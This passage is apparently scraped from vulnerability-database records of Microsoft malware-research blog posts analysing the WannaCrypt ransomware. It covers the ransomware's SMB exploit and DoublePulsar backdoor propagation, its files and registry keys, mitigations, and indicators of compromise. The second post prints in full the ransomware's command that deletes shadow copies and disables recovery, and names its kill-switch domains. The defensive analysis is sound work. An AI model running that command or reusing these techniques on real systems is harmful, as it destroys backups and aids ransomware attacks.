IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n\n\n_Figure 17. Dropping main payload to file system_\n\n\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n\n\n_Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-30T13:00:00", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-30T13:00:00", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * _TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. The vicious infection cycle continues as the scanning routing discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-13T06:40:39", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-05-13T06:40:39", "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-30T15:02:19", "description": "\n\nOn April 14, a group calling themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). Shortly thereafter, one of these exploits was used to create wormable malware that we now know as [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device 